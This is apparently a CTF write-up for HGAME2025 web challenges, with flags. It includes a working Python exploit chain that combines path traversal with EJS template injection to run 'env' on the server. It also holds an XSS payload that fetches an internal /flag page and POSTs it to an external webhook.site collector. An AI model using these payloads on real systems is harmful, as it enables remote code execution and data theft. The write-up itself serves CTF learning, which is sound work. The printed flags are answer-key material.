HGAME2025 部分WP
Web
Level 24 Pacman
栅栏密码（Rail Fence），按 2 栏解密即可得到 flag：
hgame{u_4re_pacman_m4ster}
Level 47 BandBomb
服务端使用 EJS 模板渲染，而 /rename 接口对 newName 没有做路径校验，可以通过 `../` 目录穿越把上传的文件覆盖到现有的 .ejs 模板上，页面渲染时即可执行任意代码（RCE）。
import requests
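def upload_evil_template(url, timeout=10):
    """Upload an EJS template that runs `env` on the server and return its stored name.

    The body is a plain EJS file: `<%- ... %>` is an *unescaped* output tag, so
    whatever the expression evaluates to is written into the rendered page as-is.
    The expression reaches `child_process` through
    `global.process.mainModule.require` and runs `env`, which is how the FLAG
    environment variable ends up in the response once the template is rendered.

    Args:
        url: Base URL of the target, without a trailing slash.
        timeout: Seconds to wait for the HTTP request, so a dead node does not
            hang the script forever.

    Returns:
        The server-assigned filename taken from the JSON reply of POST /upload.

    Raises:
        requests.HTTPError: if /upload does not answer with a 2xx status.
        KeyError: if the JSON reply has no "filename" field.
    """
    # The template is uploaded under a harmless .txt name; the rename step
    # (move_template) later turns it into a .ejs file inside the views directory.
    evil_template = '''
<%- global.process.mainModule.require('child_process').execSync('env') %>
'''
    files = {
        'file': ('evil.txt', evil_template)
    }
    r = requests.post(f"{url}/upload", files=files, timeout=timeout)
    r.raise_for_status()
    return r.json()['filename']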
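def move_template(url, filename, timeout=10):
    """Rename the uploaded file over the EJS view that the index page renders.

    POST /rename takes `oldName`/`newName` as JSON. The new name is a relative
    path containing `../` segments; the fact that this works means the server
    presumably joins it onto the upload directory without normalising or
    confining the result (path traversal), so an upload can land in
    `app/views/`. The traversal depth (two `..`) and the target name
    `mortis.ejs` are specific to this challenge's layout.

    Args:
        url: Base URL of the target, without a trailing slash.
        filename: Name returned by upload_evil_template.
        timeout: Seconds to wait for the HTTP request.

    Returns:
        The requests.Response from POST /rename. The status is not checked
        here; the caller should look at `.ok` / `.status_code`.
    """
    data = {
        'oldName': filename,
        'newName': '../../app/views/mortis.ejs',
    }
    return requests.post(f"{url}/rename", json=data, timeout=timeout)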
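def trigger_rce(url, timeout=10):
    """GET the index page so the overwritten template is rendered and the payload runs.

    Args:
        url: Base URL of the target, without a trailing slash.
        timeout: Seconds to wait for the HTTP request.

    Returns:
        The requests.Response; its `.text` carries the rendered page (and, on
        success, the output of `env`).
    """
    return requests.get(f"{url}/", timeout=timeout)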
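def main(url="http://node1.hgame.vidar.club:32025"):
    """Run the three-step chain: upload -> traversal rename -> render.

    Args:
        url: Base URL of the target; defaults to the challenge instance used in
            the write-up.
    """
    print("[+] 上传恶意模板...")
    filename = upload_evil_template(url)
    print("[+] 移动模板文件...")
    resp = move_template(url, filename)
    # If the rename was rejected, rendering the index page would just return the
    # untouched view, so stop here instead of printing a misleading page.
    if not resp.ok:
        print(f"[-] rename failed: HTTP {resp.status_code}")
        return
    print("[+] 触发模板渲染...")
    r = trigger_rce(url)
    print(r.text)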
# Script entry point: run the full exploit chain against the hard-coded target.
if __name__ == "__main__":
    main()
# FLAG=hgame{@ve-mUJ1cA-HAs-BrokEn_up_BUt_wE_H@VE_UMIT4ki3c}
Level 69 MysteryMessageBoard
首先是密码爆破
这里利用的是 XSS：把下面的脚本作为留言注入，等其他人（通常是后台 bot）查看留言时，在其浏览器里读取 127.0.0.1:8888/flag 并把内容 POST 到 webhook.site 外带。脚本如下：
<script>
// Runs in the browser of whoever views the message. It reads the
// internal-only endpoint at 127.0.0.1:8888/flag and ships the body to an
// external collector. NOTE(review): assumes the board itself is served from
// 127.0.0.1:8888 so the first fetch is same-origin — confirm against the challenge.
(async () => {
  const flagPage = await fetch('http://127.0.0.1:8888/flag');
  const body = await flagPage.text();
  await fetch('https://webhook.site/c149920f-141c-4d08-af14-1a6a58cbe3a9', {
    method: 'POST',
    body
  });
})();
</script>